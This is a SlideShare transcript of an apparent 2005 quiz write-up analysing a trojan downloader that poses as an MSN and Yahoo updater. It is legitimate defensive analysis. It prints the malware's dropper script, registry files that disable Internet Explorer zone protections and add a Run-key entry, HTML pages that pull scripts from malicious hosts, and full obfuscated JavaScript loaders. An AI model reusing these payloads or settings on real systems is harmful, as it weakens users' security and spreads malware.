Your SlideShare is downloading. ×

Malware analysis

304

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
304
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Malware AnalysisRandy Armknecht – http://www.rarmknecht.comOctober 20051. What is a .cmd extension? In which systems that this file extension would work?It’s an executable extension for files that will be run by the cmd.exe interpreter on Windows NT and upmachines. CMD files do NOT start with the bytes 0x4D5A like Win32/PE .exe files do. Typically, and asis the case with this malware, the .cmd file is an ASCII file that is run as a script by the interpreter.2. Did you check the MD5 of the unzipped binary? Does it match?I did and it matches as seen below:C:MalwareGroundZeropbuenoquiz3>md5 BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629dE50E87AD5D34CF8D16D01447821D629D BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629dpbuenos e50e87ad5d34cf8d16d01447821d629dmine E50E87AD5D34CF8D16D01447821D629D3. Is it packed? If yes, which packed was used?I ran the strings command below and believe that the output shows it to be packed with UPX and aWinRAR Self Extracting Executable.Strings v2.2Copyright (C) 1999-2005 Mark RussinovichSysinternals - www.sysinternals.comASKNEXTVOLRD1xtASKNEXTVOLGETPASSWORD1LICENSEDLGRENAMEDLGREPLACEFILEDLGSTARTDLGDVCLALccppMZPThis program must be run under Win32UPX0UPX1.rsrc1.20UPX!SVW…name="Roshal.WinRAR.WinRAR"
  • 2. 4. What is this piece of malware claiming to be?By reading the SFX Comments section we can see that the malware is claiming to be an updater for MSNand Yahoo. Inside is a .cmd file.;The comment below contains SFX script commandsPath=.%systemroot%SavePathSetup=msnupdater.cmdSilent=1Overwrite=1Title=Msn & Yahoo UpdaterText{Updater for Msn and Yahoo Home pages}License=Home Page Setup Updater{Msn and Yahoo Page updater}5. Please describe the process which this malware will try to get installed on the system.From the SFX section it looks like the malware will copy msnupdater.cmd to %SYSTEMROOT%. The Silentflag is set so it will not display any graphical notification to the user that it happened. Also, theOverwrite flag is set, so if the file already exists it will be over written; possible way for the malwareto update older versions of itself? After the file has been copied it will be executed.Thanks to FileMon we can see the cmd file being copied here:After that file is created it creates yahoohomepage.htmlThen it creates what looks to be a registry file 2377.reg
  • 3. After 2377.reg it creates 5577.reg and msnhomepage.htmlNow that all the files it needs to do its evil bidding are in place it uses cmd.exe to execute bothmsnupdater.cmd and regedit.exeRegedit then loads the two previously copied down .reg files and imports them
  • 4. After that it opens Internet Explorer and loads msnhomepage.htmlAfter closing that IE window it then relaunches IE and displays the yahoohomepage.html fileWhat it displays is shown belowAfter closing the Yahoo IE window the .cmd file finishes up and closes
  • 5. 6. After some investigation on a machine that had this malware installed, was verified that themachine was trying to access something related to "*msn*" and "*yahoo*"... Does this malware havesomething to do with it? If so, with which purpose? :-)I would say absolutely. Especially if the something it was trying to access were msnhomepage.html oryahoohomepage.html. Let’s take a look at those files shall we?msnhomepage.html<html><title> Welcome to Msn.com </title><meta http-equiv="refresh" content="20;url=http://www.razor-radio.us"><body>Standby Loading Msn.com .......<!-- AUTO PROMPT START --><script language="javascript" type="text/javascript"src="http://static.windupdates.com/prompts/a372a171/a770ab73.js"></script><script language="javascript" type="text/javascript">self.focus();</script><!-- AUTO PROMPT END --></body></html>We can see that the only purpose of this page is to first load a JavaScript file fromstatic.winupdates.com. After 20 seconds it refreshes the page to display www.razor-radio.usThe machine that the malware executed on doesn’t have an internet connection, so I grab thea770ab73.js file using curl on a *nix box. We’ll take a more detailed look at the javascript and websitelater.yahoohomepage.html<html><title> Welcome to Yahoo.com </title><meta http-equiv="refresh" content="115;url=http://www.yahoo.com"><body>Standby Loading Yahoo.com ...........................................<!-- AUTO PROMPT START --><script language="javascript" type="text/javascript"src="http://static.windupdates.com/prompts/a376ab73/a776a174.js"></script><script language="javascript" type="text/javascript">self.focus();</script><!-- AUTO PROMPT END --><!-- AUTO_PROMPT AD START --><script language=JavaScript type=text/JavaScriptsrc=http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=0&delayload=10&account_id=159080&recurrence=always&adid=a1111819823&event_type=onload&signature=adult></script><!-- AUTO_PROMPT AD END --></body></html>We can see here that this grabs two javascript files, one from static.winupdates.com like themsnhomepage.html file and another one from install.xxxtoolbar.com. These files were also grabbedusing curl on a *nix box. One improvement over the msnhomepage.html file is that after 115 seconds itreloads the page with yahoo.com. Hey, at least this time it attempts to look legit :)
  • 6. 7. In the same machine, was observed that some registry entries were messed up...Again, does thismalware have something to do with it? If so, why?Absolutely, as mentioned in my response to question 5 two .reg files are copied into the %SYSTEMROOT%directory and then imported with regedit. We can also verify this by looking at the source ofmsnupdater.cmd seen below@echo offecho Updating Windows Shell FilesREGEDIT.EXE /S 2377.regREGEDIT.EXE /S 5577.regecho Updating Windows Shell Files.....msnhomepage.htmlecho Updating Windows Shell Files........yahoohomepage.htmlecho Updating Windows Shell Files...........echo Updating Windows Shell Files..............echo Updating Windows Shell Files is now Complete.exitLets take a look at what these registry files do…2377.regWindows Registry Editor Version 5.00[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones0]"1004"=dword:00000000"1201"=dword:00000000[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones1]"1004"=dword:00000000"1201"=dword:00000000[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones2]"1004"=dword:00000000"1201"=dword:00000000[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3]"1004"=dword:00000000"1201"=dword:00000000"1406"=dword:00000000"1A04"=dword:00000000[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones4]"1004"=dword:00000000"1201"=dword:00000000"1001"=dword:00000000"1200"=dword:00000000"1400"=dword:00000000"1606"=dword:00000000"1607"=dword:00000000[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsZoneMapProtocolDefaults]"http"=dword:00000000We can see that it modifies several of the Internet Zone settings in IE. Usinghttp://support.microsoft.com/?kbid=182569 we can see that this registry file does the following: Value Setting ----------------------------------------------------------------------- 1001 Download signed ActiveX controls 1004 Download unsigned ActiveX controls
  • 7. 1200 Run ActiveX controls and plug-ins 1201 Initialize and script ActiveX controls not marked as safe 1400 Active scripting 1406 Access data sources across domains 1606 Userdata persistence 1607 Navigate sub-frames across different domains 1A04 Dont prompt for client certificate selection when no certificates or only one certificate exists *The last entry in that file specifies that any website using http as it’s protocol should be treated as 0 orlocal. Obviously, a very bad thing.5577.regWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]"SYSTRAY"="C:UNMT.EXE"This entry sets the machine to run the program UNMT.EXE each time a user logs on with a description ofSYSTRAY. What I find odd is that this file does not exist. Maybe that file is downloaded by thejavascript which we’re just about to get to.8. Please, describe how this malware tries to install softwares (and which ones) in the machine...The initial install creates the two html files, two reg files, and the msnupdater.cmd file. The cmd fileruns by first updating the registry settings of IE and adds a program to run at user login. Next thewebpages are loaded. We’ve examined the cmd file and reg files previously, along with the base codeof the html files. Now we’ll take a look at the javascripts that the webpages run.From the first webpage we saw that it executes a770ab73.js. The file looks like this:/*T5gRxPmT LQ8N19 Yo Hs4K*/var _aT8;var _20S;var _xEN=document;var _hL4;var _hCK;var _fRO;var_nMp=String;var _x5H;var _EzP;var _gQU;var _YJN;var _qR2;var _5xj=_nMp.prototype;var _dNK;var_EoB;var _jHO;var _ehN;var _e6q;var _7w1;var _9o5;var _Z6h;var _zP2;var _pG0;var_ODd;_5xj._hCK=_5xj.slice;/*V1ZBI3sc wSZFB7zhkjk HEo bS 5yiz8 _P0nRO Mcl5_9ea*/function _Z6h(_XjQ){_xEN.write("Axhw".slice(5)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice(3)+_rCz+_XjQ+".EC6zj".slice(7)+"ulswA".slice(3));}function _g8A(_XDG,_hCK){if(_hCK){returnthis._hCK(_XDG,_hCK);}var _L1b;var _T0g;var _RDA=;for(_L1b=0; _L1b<this.length; _L1b++){_T0g=this.charCodeAt(_L1b)-_XDG;if(_T0g<32){_T0g=127-(32-_T0g);}_RDA+=_nMp.fromCharCode(_T0g);}return _RDA;};_5xj.slice=_g8A;_dNK="569ddbcd2297775:53b7cb36g1c9588c473d9bg:9fec43gefcd84:d8cb5498b7e63bb427dg8287edgb61;444:77764:4947484374727444724:76494276434:7572767448414847774274".slice(1);_fRO=1;_7w1="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4}un4nsxyfqq3}un".slice(5);_YJN=0;_EoB=""m{".slice(8);_ODd="q}}yC88|}j}rl7!rwm~ymj}n|7lxv8y{xvy}|8|y;8|}ny|h ;7|!o".slice(9);_e6q=3;var _821="iuuq;00qvcmjd/xjoevqebuft/dpn0mphhjoh3/qiq".slice(1);var _WAH="nzzv@55v{hroi4}otj{vjgzky4ius5vuve{tjkx4vnv".slice(6);_x5H="Dmjdl!ZFT!up!dpoujovf".slice(1);_ehN="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4of{f4gwnilj3ofw".slice(5);_9o5="tuzoikZk~zC_u{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,xkzx SymC_u{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,yozkTgskCLxkk1Su|ok1Giikyyeeeee1Iroiq1_KY131Ol1 u{1gmx444,yozkV{hroynkxCSkjog1Giikyy,znkskC}nozk,grvngC6,rumuVgznC,rumuYo!kCrgxmk,iruykHztCzk~z".slice(6);_gQU="o{{wA66z{h{pj5~puk|wkh{lz5jvt6jhi6TlkphHjjlzz6pl6iypknl4j@5jhi".slice(7);_zP2="rqordg".slice(3);_jHO="Dmjdl!ZFT!up!dpoujovf".slice(1);_hL4=1;var_rCz="jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1".slice(2);_qR2=1;_20S=0;_pG0=0;_p_sf=_9o5;_p_ry=_e6q;_p_lu=_821;_p_xu=_7w1;_p_cl=_aT8;_p_cd=_20S;_p_sm=_ODd;_p_ws=_Z6h;_p_pu=_EoB;_p_pr=_dNK;_p_cr=_hL4;_p_dl=_YJN;_p_ju=_ehN;_p_cm=_x5H;_p_ct=_fRO;_p_rm=_jHO;_p_cp=_EzP;_p_pl=_WAH;_p_lf=_qR2;_p_cu=_gQU;_Z6h("joju/kt".slice(1));/*uy J 8s9-oYlQRYYmYjWczG*/Sure looks nasty, but I wrote a quick little html page that will output the results of the file to atextarea on a webpage. From that we can see that all it really does is write the following to thedocument object.
  • 8. <script language=JavaScript type=text/javascriptsrc=http://static.windupdates.com/prompts/js/init.js></script>Init.js looks like the following/*KN1FccO*/var _G0C=_p_pu;var _S0K=document;var _Y0C=_p_ws;var_B0b=":>JM?@AB6LMK=6=@N:6JBMJ6BB;NNAN?KJM?".slice(9);var _q0c;var _V0S=_p_pr;var _g0e=escape;var_n0C=navigator;var _d0T;var _T0l=parseInt;var _e0c=_p_lu;var _i0o=true;var _R0p;var _10T;var_M0J=["SkjogGii^".slice(6),"RjinfFhhjxx".slice(5),"SkjogMgzk}g ^".slice(6),"NfejbHbufxbz".slice(1)];var _d0z=false;var _E0a;var _F0H=_p_cp;var _W0v=n;var _Z0P=_S0K.location.href.substr(0,150);var _90h={on:_d0z,ov:_d0z,omv:_d0z,ovn:_d0z,bn:_d0z,bv:_d0z,bmv:_d0z,str:_d0z};function_F07(){_h0x();if(_90h.bn=="ntjf".slice(1)&&_90h.on==" qv".slice(8)){_S0K.write("Axhw".slice(5)+"qx|(tivo}iomE/^J{kzqx|/(|"xmE/|m!|7~j{kzqx|/F".slice(8)+_W0v+"N}vk".slice(8)+"zout&jeG^.g^".slice(6)+"Tgsk/".slice(6)+_W0v+"""Qp"Gttqt"Tguwog"Pgzv".slice(2)+_W0v+"%%HwjfyjTgojhy-f]".slice(5)+"Uhtl0".slice(7)+_W0v+"((lgI`Ez}m".slice(8)+_W0v+"$$Mj$Ivv@B4$Xlir".slice(4)+_W0v+"""""faCZ?Hcnug".slice(2)+_W0v+"%%Jsi%Nk".slice(5)+_W0v+"Foe!Gvo".slice(1)+"gxmsr".slice(4)+_W0v+"B5yix".slice(6)+"mtxB".slice(4));}_20I("klw".slice(3));_M0g((_G0C==""m{".slice(8)),(_F0H==1),_o0f());}function _h0x(){var_904=_n0C.userAgent.toLowerCase();var _40h;var _B0j;if(_n0C.appMinorVersion){_40h=_n0C.appMinorVersion.toLowerCase();}else{_40h=;}var _704={firefox:["or{nox"".slice(9)],konqueror:["swvy}mzwz".slice(8)],opera:["xyn{j".slice(9)],safari:["tbgbsj".slice(1)],netscape:["rixwgeti:".slice(4),"pgvuecrg".slice(2),"su!orrg".slice(6)],msie:["pvlh".slice(3)],mozilla:["tx".slice(2)]};var _T0a={win:{win2k3:["!rwmx!|)w})>7;".slice(9)],winxp:["zlqgrzv#qw#814".slice(3),"ykpfqyu"zr".slice(2)],win2k:["~pukv~zu{<57".slice(7),"zlqgrzv#5333".slice(3)],winnt:["~puu{".slice(7),"}otju}y&tz".slice(6)],winme:["zlq#<{#71<3".slice(3)],win98:["}ot?>".slice(6),"~pukv~z@?".slice(7)],win95:["ykp;7".slice(2),"}otju}y&?;".slice(6)],win31:["!rwmx!|)<7:".slice(9),"}ot7<".slice(6),"{mrhs{w$5:1fmx".slice(4),"38dkv".slice(2)],win:["zlqgrzv".slice(3),"ykp".slice(2)]},os2:{os2:["uy58".slice(6),"qju5 mjm!xtwzmz".slice(8)]},mac:{osx:["sgi&uy&~".slice(6)],mac9:["qeg$=2".slice(4)],mac:["vjl".slice(9)]},unix:{linux:["ot{~".slice(6)],unix:["wyrsw".slice(4),"qzq!".slice(8),"ow4| ".slice(7),"jr"".slice(9),"tdp".slice(1),"yrm|cw}wxiqcz".slice(4),"qfu".slice(3),"zmtqiv|}vq!".slice(8),"mnl".slice(9),"bmqib".slice(1),"ypxvm|".slice(4),"xnsn}".slice(5),"izk".slice(7)," 88".slice(7)]}};var _a09=["|y:".slice(9),"ur4".slice(2),"yv9".slice(6),"{x<".slice(8),"|y>".slice(9),"zw=".slice(7)];for(_R0p in _704){if(_904.indexOf(_R0p)!=-1){_90h.bn=_R0p;break;}}if(!_90h.bn){_90h.bn="sxliv".slice(4);}var_l0m=_d0z;for(_R0p in _704[_90h.bn]){_d0T=_704[_90h.bn][_R0p];_l0m=_904.indexOf(_d0T);if(_l0m!=-1){break;}}if(_90h.bn=="su!orrg".slice(6)&&_l0m==-1){_90h.bn="sjyxhfuj".slice(5);for(_R0p in _704[_90h.bn]){_d0T=_704[_90h.bn][_R0p];_l0m=_904.indexOf(_d0T);if(_l0m!=-1){break;}}}new RegExp("*]/02/;c/|_-+".slice(2)).exec(String(_904.substr(_l0m+_d0T.length+1)));_E0a=RegExp.$1;if(_90h.bn=="|joj{r".slice(9)){_90h.bv=_T0l(_E0a / 100);if(_90h.bv){_90h.bmv=_E0a.substr(String(_90h.bv).length,10);}else{_90h.bmv=_T0l(_E0a-(100 * _90h.bv));}}else if(_90h.bn!="v{oly".slice(7)){_l0m=_E0a.indexOf(.);if(_l0m!=-1){_90h.bmv=_E0a.substr(_l0m+1,10);}else{_90h.bmv=0;}_90h.bv=_T0l(_E0a);}if(isNaN(_90h.bv)||!_90h.bv){_90h.bv=0;}if(!_90h.bmv){_90h.bmv=0;}for(_R0p in_T0a){for(_q0c in _T0a[_R0p]){for(_10T in _T0a[_R0p][_q0c]){if(_904.indexOf(_T0a[_R0p][_q0c][_10T])!=-1){_90h.on=_R0p;_90h.ov=_q0c;break;}}if(_90h.on){break;}}if(_90h.on){break;}}if(_90h.on&&_90h.ov){for(_R0p in _a09){if(_40h.indexOf(_a09[_R0p])!=-1){_90h.omv=_a09[_R0p];_90h.ovn=_R0p+1;break;}}}else{_90h.on="tymjw".slice(5);_90h.ov="uznkx".slice(6);}if(!_90h.omv){_90h.omv="sxliv".slice(4);_90h.ovn=0;}if(_90h.bn=="qwmi".slice(4)&&_90h.ov=="!rw"y".slice(9)&&_90h.ovn>=2){_B0j="mshzo".slice(7);}else{_B0j="ri~i{kzqx|".slice(8);}_90h.str=_90h.bn+:+_90h.bv+:+_90h.bmv+:+_90h.on+:+_90h.ov+:+_90h.omv+:+_B0j;}function_o0f(){var _K0e="0kpuvcnngt".slice(2);if(_90h.bn=="syok".slice(6)&&_90h.on=="}ot".slice(6)){for(_R0p in _M0J){if(d_AX(_M0J[_R0p]+_K0e)){return _M0J[_R0p];}}}return _d0z;}function _20I(_F0E){if(_F0E=="fqypnqcf".slice(2)){_S0K.write("E|l{".slice(9)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice(3)+_e0c+"CtA".slice(4)+_g0e(_V0S)+",hC".slice(6)+_g0e(_90h.str)+"/|F".slice(9)+_g0e(_Z0P)+"0GE8|l".slice(9)+"ypw{E".slice(7));}}function _M0g(_G0o,_r02,_10d){if(!_10d){_20I("epxompbe".slice(1));}if(_G0o){_Y0C("wvwf|ukly5qz".slice(7));}if(!_10d||_r02){var_c0q;if(_r02){_c0q="qspufdu".slice(1);}else{_c0q="wyvtw{".slice(7);}if(_90h.bn=="pvlh".slice(3)&&_90h.on==" qv".slice(8)){_c0q+="eok".slice(6);if(_90h.ov=="{mr|t".slice(4)&&_90h.ovn>=2||_90h.ov=="zlq5n6".slice(3)){_c0q+="c|twt6".slice(4);}else{_c0q+="bzlq".slice(3);}}else{_c0q+="dijkfzqy".slice(5);}if(_c0q=="tvsqtxchijeypx".slice(4)){return;}_c0q+="/kt".slice(1);_Y0C(_c0q);}}_i_br=_90h;_i_da=_o0f;_i_ci=_B0b;_F07();/*NBPZPuuYyrnyO2CDIiHdd9cN-*/
  • 9. From the size of it, we can see that this is most likely what’s about to do the majority of the work. Iput it through my decryptor and … well what do you know, it stalls out when trying to grab the useragent. Because the script never finishes I wasn’t able to make it decode itself. Could it be because thebox is fully patched up through October? Guess I’ll find out when other people post their answers.9. If you could give only one advise to your users, based on what you observed on this malware,what would you say?Always be careful when going to websites. The javascripts are downloaded from windupdates.com, andthe malware tries to pretend to be Yahoo! and MSN even though it doesn’t do a good job of it. Modernphishing emails are more convincing 10. Do you think that our affected user was lying to the IR Team?I do not think the user was lying. One of the main websites that feeds this malware iswindupdates.com. An uninformed or simple user might think that it’s just short for Windows Updatesand not know that they should only update their computer by clicking Start->Programs->WindowsUpdate which should take them to http://windowsupdate.microsoft.com11. Finally(!!), how would you classify this malware?I’m not familiar with the various categories the malware could be categorized in. But I might consider ita Trojan since it claims to do one thing but does another, and maybe as a downloader since it goes outto the windupdates.com website to grab its JavaScript files. The remote files can be updated to providenew improved functionality while the only infecting executable won’t need to be updated.

×